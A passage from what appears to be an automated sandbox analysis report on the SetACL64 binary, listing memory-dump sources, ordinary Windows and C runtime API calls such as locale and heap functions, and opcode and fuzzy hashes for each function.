                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: InfoLocaletry_get_function
                              • String ID: GetLocaleInfoEx
                              • API String ID: 2200034068-2904428671
                              • Opcode ID: 591c11f87c398ef623a2c4855596f7f13eeda1a7201aaa3cd71a990fcb1b3bf8
                              • Instruction ID: 9ddad269b007bfb24349004ba096b988c96216784d848ca875056ea28f99bfa7
                              • Opcode Fuzzy Hash: 591c11f87c398ef623a2c4855596f7f13eeda1a7201aaa3cd71a990fcb1b3bf8
                              • Instruction Fuzzy Hash: A801A4A5B08B4282E724DB62F8404EAB761EF94BD0F984476DE4CD3B5ADF3CD9418740
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: memcpy_s
                              • String ID:
                              • API String ID: 1502251526-0
                              • Opcode ID: e968225ff8479ec0e065da208cfe27b2d7ffdba7a15fb48c526d8961649b34dc
                              • Instruction ID: 804278d588d6814482484cb21f588dcbbbcbd33d6cbacca17029f78d153a9eab
                              • Opcode Fuzzy Hash: e968225ff8479ec0e065da208cfe27b2d7ffdba7a15fb48c526d8961649b34dc
                              • Instruction Fuzzy Hash: 84C1D3B2B1968687E734CF19A58466ABB95F784B88F548134DB4AC3744DE3CF841CB40
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: InfoLocale$ErrorLast_invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3644580040-0
                              • Opcode ID: e0e0df95b1f6772363a05c4c36da6839cc36b3106741a851fa59558ae610ced7
                              • Instruction ID: c7c1fc981366ccb7e6756a13ba2c0e4a456d7cdbdc879c82daa2a2aafdeb974b
                              • Opcode Fuzzy Hash: e0e0df95b1f6772363a05c4c36da6839cc36b3106741a851fa59558ae610ced7
                              • Instruction Fuzzy Hash: 4E61AEB2A086428AEB34CF55E4412BD73A1FB94B80F449275DB9ED3699DF3DE590C700
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ExceptionRaise_clrfp
                              • String ID:
                              • API String ID: 15204871-0
                              • Opcode ID: 0895176a6f24f428c0ae16b17dcf63319d29ac092c4d084468464062deae3fc8
                              • Instruction ID: c30a88e597f41c116b8c405f61de3e1b7811a65977bb8c0240f0e0de0a1fc8e2
                              • Opcode Fuzzy Hash: 0895176a6f24f428c0ae16b17dcf63319d29ac092c4d084468464062deae3fc8
                              • Instruction Fuzzy Hash: DAB15EB3604B448BEB25CF29C4863AC37A0F784B98F198965DA5DC7BA4CF3AD451C700
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Wcsftime$_invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 4239037671-0
                              • Opcode ID: 2ef4f36d1aa6fcae589421110de3d38a91482b1a2c577441207edf7b25e29ba5
                              • Instruction ID: f13b55077fe1793613c08fcffc2e7971073b580c411e05de6ae0efbd8d6c97d7
                              • Opcode Fuzzy Hash: 2ef4f36d1aa6fcae589421110de3d38a91482b1a2c577441207edf7b25e29ba5
                              • Instruction Fuzzy Hash: D48190A2A05A5185EB70CF25D8813BD2760FB84BE8F548676EE5ED7B85DF38E0428340
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Info
                              • String ID:
                              • API String ID: 1807457897-0
                              • Opcode ID: f736d91cb022e7ef8bf60a3b77d029e80154dd222c53dc79b684657965080790
                              • Instruction ID: cc5af991fa428ff1a8bd743e12d7eaa9d04a03ab786d9325fa24d04851fd4d57
                              • Opcode Fuzzy Hash: f736d91cb022e7ef8bf60a3b77d029e80154dd222c53dc79b684657965080790
                              • Instruction Fuzzy Hash: B2129D62A08BC586E761CF3894443FD73A4FB58788F459235EB9CC6692EF39E185C700
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 90b5727a5fea50101d027ed916251c361a40c46f32150c6b4c553662c3fa156e
                              • Instruction ID: 0163ac9746244582c12024207b821687c49f63600fead9d234fa122cd22125b2
                              • Opcode Fuzzy Hash: 90b5727a5fea50101d027ed916251c361a40c46f32150c6b4c553662c3fa156e
                              • Instruction Fuzzy Hash: 86E148B6A08B8186E720DB61E4406EE27A4FB987C8F414675DF9DD7796EF39D248C300
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _get_daylight_invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 474895018-0
                              • Opcode ID: 42818a656ba6ab8851ffb2ca6ee8ba788b28637204efe2d9c2507415ecd12c88
                              • Instruction ID: 4b6f70cd5325e48718855b93fe3deee8027bfb9ec4e765b7a7306b26996f4ec7
                              • Opcode Fuzzy Hash: 42818a656ba6ab8851ffb2ca6ee8ba788b28637204efe2d9c2507415ecd12c88
                              • Instruction Fuzzy Hash: BB71E3A2B0C28246F7748F29D49037DE691EFA03E8F1406B5DA6DC76C5DE7DE8418B00
                              APIs
                                • Part of subcall function 00007FF697083E64: GetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083E73
                                • Part of subcall function 00007FF697083E64: SetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083F11
                              • GetLocaleInfoW.KERNEL32 ref: 00007FF6970873A8
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorLast$InfoLocale
                              • String ID:
                              • API String ID: 3736152602-0
                              • Opcode ID: af1d4031c5ed2eef11897b55d0d56a85b12ac158b9d71c250bbe29e6eef00158
                              • Instruction ID: c2e7ce376a25a3ca5c5ab6cf0c61a83ddc2034655f7073dc3de9043fd537ebf8
                              • Opcode Fuzzy Hash: af1d4031c5ed2eef11897b55d0d56a85b12ac158b9d71c250bbe29e6eef00158
                              • Instruction Fuzzy Hash: 0431B1B2A0868286EB34DB25E4413FA77A0FB987C4F44A175DA5DC3689DF7DE4508700
                              APIs
                                • Part of subcall function 00007FF697083E64: GetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083E73
                                • Part of subcall function 00007FF697083E64: SetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083F11
                              • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF697087777,?,00000000,00000092,?,?,00000000,?,00007FF69707966D), ref: 00007FF69708702A
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorLast$EnumLocalesSystem
                              • String ID:
                              • API String ID: 2417226690-0
                              • Opcode ID: 2d688c485545e7f50bc5d8269bd6737817ee269d86edfb0b03b51b9adc2a374d
                              • Instruction ID: 3b7bfe8e8f80a972750f284d8b90bf8441d6ddf514a5dca750976920ad1d8456
                              • Opcode Fuzzy Hash: 2d688c485545e7f50bc5d8269bd6737817ee269d86edfb0b03b51b9adc2a374d
                              • Instruction Fuzzy Hash: 6511DFA3A08645CAEB24CF59D4402E87BA0EB90BE0F459175DA69C33C9DE69DAD1CB40
                              APIs
                                • Part of subcall function 00007FF697083E64: GetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083E73
                                • Part of subcall function 00007FF697083E64: SetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083F11
                              • GetLocaleInfoW.KERNEL32(?,?,?,00007FF6970872F1), ref: 00007FF69708757F
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorLast$InfoLocale
                              • String ID:
                              • API String ID: 3736152602-0
                              • Opcode ID: 4892b2bfc4ba0652f930113fa4804a2aa18176b4a3f13595406afc7e77e25a07
                              • Instruction ID: 9a699634e8f19d0e534f82398f046bc7f70cd41ecb3e20e19fa0423385db6a0d
                              • Opcode Fuzzy Hash: 4892b2bfc4ba0652f930113fa4804a2aa18176b4a3f13595406afc7e77e25a07
                              • Instruction Fuzzy Hash: C1110A72A1C65682E774D751D0406F963A1EB80BA4F146371DA2DC76C8DE7AD981C740
                              APIs
                                • Part of subcall function 00007FF697083E64: GetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083E73
                                • Part of subcall function 00007FF697083E64: SetLastError.KERNEL32(?,?,?,00007FF6970799DD), ref: 00007FF697083F11
                              • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF697087733,?,00000000,00000092,?,?,00000000,?,00007FF69707966D), ref: 00007FF6970870DA
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorLast$EnumLocalesSystem
                              • String ID:
                              • API String ID: 2417226690-0
                              • Opcode ID: 6cbebb99cc6e6a2fa077ddb3746b0719ab2037c4ac3932a484c09a47ce009c50
                              • Instruction ID: d2c5215dbf6cfbf791e7db799c5ac22dd16218cbdce4edf9e28e4d0b925d7b75
                              • Opcode Fuzzy Hash: 6cbebb99cc6e6a2fa077ddb3746b0719ab2037c4ac3932a484c09a47ce009c50
                              • Instruction Fuzzy Hash: 8F01B5B2F0828186E7248B55E840BF97691EBD0BE4F45A371D679C76D9DF7A9480CB00
                              APIs
                              • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF697087D71,?,?,?,?,?,?,?,?,00000000,00007FF6970865D8), ref: 00007FF69708796B
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: EnumLocalesSystem
                              • String ID:
                              • API String ID: 2099609381-0
                              • Opcode ID: 50e1e414d65792309ee3aaeac2ef96dc1d2e2a6e8bc8ede1a31a07ac19fd8208
                              • Instruction ID: e7303d0f454eddabc32903c6fea3a2a1a836ac05c9970a9b9704f19ce7137a69
                              • Opcode Fuzzy Hash: 50e1e414d65792309ee3aaeac2ef96dc1d2e2a6e8bc8ede1a31a07ac19fd8208
                              • Instruction Fuzzy Hash: E7F03CB6B08B4583EB24DB55F8502A923A1FB98BC0F589175DA4DC3769DF3CE551C700
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID: 0
                              • API String ID: 3215553584-4108050209
                              • Opcode ID: fe1b77cc4fb1327b84eb0cd94c59786dff3a84c6f721406d97121f11905029f2
                              • Instruction ID: e5fee65b933231a90b5833c0a6f6e299d6db81e260db6a04c82d1f058153918a
                              • Opcode Fuzzy Hash: fe1b77cc4fb1327b84eb0cd94c59786dff3a84c6f721406d97121f11905029f2
                              • Instruction Fuzzy Hash: 83612591A0C28246FA788B695C003BB5799EF42BC8F4405B5DD89D77DACE2DE84787C1
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID:
                              • String ID: -
                              • API String ID: 0-2547889144
                              • Opcode ID: 4c1d9a599cc3bcd7ac7ed3d62c53db48a1b6c212b4efefffed7360049bb86f53
                              • Instruction ID: 7dcc4914bce7ae0b57c93949639b1a08559f1945b92d0834395564a5cbb303e5
                              • Opcode Fuzzy Hash: 4c1d9a599cc3bcd7ac7ed3d62c53db48a1b6c212b4efefffed7360049bb86f53
                              • Instruction Fuzzy Hash: CB61F4A2A2878585EA709B2994043BEB795FB95BE4F444275DB9EC3BD8DF3ED4008700
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: HeapProcess
                              • String ID:
                              • API String ID: 54951025-0
                              • Opcode ID: 227af5b2b01adeec9a4c4bb0160e400c0b56438fa23b95ceffa25b2c6b663f7a
                              • Instruction ID: 244447f6c0714a5c7ea6c0a1927d47aaf6412753debe43cc2e6d79ed83c41d11
                              • Opcode Fuzzy Hash: 227af5b2b01adeec9a4c4bb0160e400c0b56438fa23b95ceffa25b2c6b663f7a
                              • Instruction Fuzzy Hash: 6EB092A0E07A0AC2EA182B556C4221422A5BF58B91F8840B8C20DC1320EF2C20A65710
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 804cbed04cb1b024b7a53ade8bd45d4e88f9643a1cf6792c7eebf2e20a23fd07
                              • Instruction ID: 7f910e21fa7e3cb1ac97b9cb64e7b42e4da3c98a17b7e033c277582c1fd364eb
                              • Opcode Fuzzy Hash: 804cbed04cb1b024b7a53ade8bd45d4e88f9643a1cf6792c7eebf2e20a23fd07
                              • Instruction Fuzzy Hash: 6E626EA1E29F5695E6B39F35A8116766324FF663C4F0183B3E80EF6660DF2CF4528600
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ExceptionFileHeaderRaise
                              • String ID:
                              • API String ID: 2573137834-0
                              • Opcode ID: db6c7db9ba73bacb7339c37cc7ab61be6a1ca176040ca25b453e64a39fde0fd1
                              • Instruction ID: 5279f2a8bac3189033db61debf5b959acc9906f9595ae28902ab1931698a5bae
                              • Opcode Fuzzy Hash: db6c7db9ba73bacb7339c37cc7ab61be6a1ca176040ca25b453e64a39fde0fd1
                              • Instruction Fuzzy Hash: BE328CA6B04B8586DB24DF26D9906AD6761FB85FC8F058522DF4ED7BA8DF38E441C300
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1bddaa04ba479b5e3c122ea19f61bbb641f9d70ba39f3eaafaf3c5aa2504da0b
                              • Instruction ID: 4b86630edef89783e385c384f3460f66699f3806b84e38b997780e2c1400fdc1
                              • Opcode Fuzzy Hash: 1bddaa04ba479b5e3c122ea19f61bbb641f9d70ba39f3eaafaf3c5aa2504da0b
                              • Instruction Fuzzy Hash: 6C12BCA2A09A8182DB30DF29D0506BD7B61FB9AF84F4591A6CB8EC7795DF3DD149C300
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8cc424a777be5028136a971fc0df0c9e471f88d56c3a3877931117becaa86a14
                              • Instruction ID: f9e6d777c898cb2404f88f36ae6bb5bbce86db04b2ce40676ca9238948625da9
                              • Opcode Fuzzy Hash: 8cc424a777be5028136a971fc0df0c9e471f88d56c3a3877931117becaa86a14
                              • Instruction Fuzzy Hash: 43D147A2A19B89C0EE60CB15D05066973A1FBA8FC4F544676DE8E87B98FF3CE451D340
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
